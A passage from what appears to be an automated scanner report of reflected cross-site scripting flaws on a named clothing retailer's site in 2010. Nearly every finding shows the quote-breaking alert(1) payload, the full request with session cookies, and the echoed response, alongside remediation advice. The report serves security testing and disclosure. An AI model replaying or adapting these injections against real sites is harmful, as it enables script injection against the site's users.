The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66513"-alert(1)-"6d7e2439d02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women66513"-alert(1)-"6d7e2439d02/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qvi6uvqv40uokanqel4ccrt0e6; expires=Tue, 09-Nov-2010 17:09:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women66513"-alert(1)-"6d7e2439d02/woven-shirts/");
//]]>
...[SNIP]...

1.280. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3987"-alert(1)-"e15c6a40149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/woven-shirtse3987"-alert(1)-"e15c6a40149/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pifjben75gbg7vjdt8e2c1rte2; expires=Tue, 09-Nov-2010 17:10:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/woven-shirtse3987"-alert(1)-"e15c6a40149/");
//]]>
...[SNIP]...

1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd97"-alert(1)-"328bf5904c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:08:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v475frll84i348g101n8b65cs0; expires=Tue, 09-Nov-2010 17:08:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1");
//]]>
...[SNIP]...

1.282. https://www.fredperry.com/customer/account/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c3dc"-alert(1)-"76794ee1910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer8c3dc"-alert(1)-"76794ee1910/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lig1hamq19vigkptie5smff0h3; expires=Tue, 09-Nov-2010 17:28:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer8c3dc"-alert(1)-"76794ee1910/account/");
//]]>
...[SNIP]...

1.283. https://www.fredperry.com/customer/account/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58371"-alert(1)-"854ac7c6992 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account58371"-alert(1)-"854ac7c6992/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=btgkebc10t2gjuigr3f5i4g5a6; expires=Tue, 09-Nov-2010 17:28:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account58371"-alert(1)-"854ac7c6992/");
//]]>
...[SNIP]...

1.284. https://www.fredperry.com/customer/account/login/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b84ec"-alert(1)-"731c73bbde8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customerb84ec"-alert(1)-"731c73bbde8/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i750lfosl1s47pnanmg5inj6p2; expires=Tue, 09-Nov-2010 17:28:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customerb84ec"-alert(1)-"731c73bbde8/account/login/");
//]]>
...[SNIP]...

1.285. https://www.fredperry.com/customer/account/login/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61c53"-alert(1)-"5e56b29bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account61c53"-alert(1)-"5e56b29bc4/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j89bi60c7faef84lhq7uka42e5; expires=Tue, 09-Nov-2010 17:28:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account61c53"-alert(1)-"5e56b29bc4/login/");
//]]>
...[SNIP]...

1.286. https://www.fredperry.com/customer/account/login/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e47f"-alert(1)-"623ae57ed21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account/login1e47f"-alert(1)-"623ae57ed21/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t09b9es2tf5c0lopedavb2inm0; expires=Tue, 09-Nov-2010 17:29:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account/login1e47f"-alert(1)-"623ae57ed21/");
//]]>
...[SNIP]...

1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc2d"-alert(1)-"f9ade8fa6f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:27:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eckdao25lgvnp6vtl5hl6anr14; expires=Tue, 09-Nov-2010 17:27:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1");
//]]>
...[SNIP]...

1.288. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c01"-alert(1)-"bf363aed77c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1 HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 18:41:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3pfqrlqdvcu228fqdlisdgne45; expires=Tue, 09-Nov-2010 19:41:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1");
//]]>
...[SNIP]...

1.289. https://www.fredperry.com/sales/order/history/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36d4e"-alert(1)-"4939634274c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales36d4e"-alert(1)-"4939634274c/order/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=utkl6i851mv1292i1u4cilrvo3; expires=Tue, 09-Nov-2010 17:28:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales36d4e"-alert(1)-"4939634274c/order/history/");
//]]>
...[SNIP]...

1.290. https://www.fredperry.com/sales/order/history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc3d"-alert(1)-"9878bb43d9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales/order5fc3d"-alert(1)-"9878bb43d9f/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=loigkgvlq3rk860abto84uanr5; expires=Tue, 09-Nov-2010 17:29:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales/order5fc3d"-alert(1)-"9878bb43d9f/history/");
//]]>
...[SNIP]...

1.291. https://www.fredperry.com/sales/order/history/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f660f"-alert(1)-"21f8a2e8aaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3kg62colr7hf79g2ki8eq19c01; expires=Tue, 09-Nov-2010 17:29:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/");
//]]>
...[SNIP]...

2. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The page contains a form with the following action URL: https://www.fredperry.com/customer/account/loginPost/ (see the response below). The form contains the following password field with autocomplete enabled: login[password] (input id "pass").

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
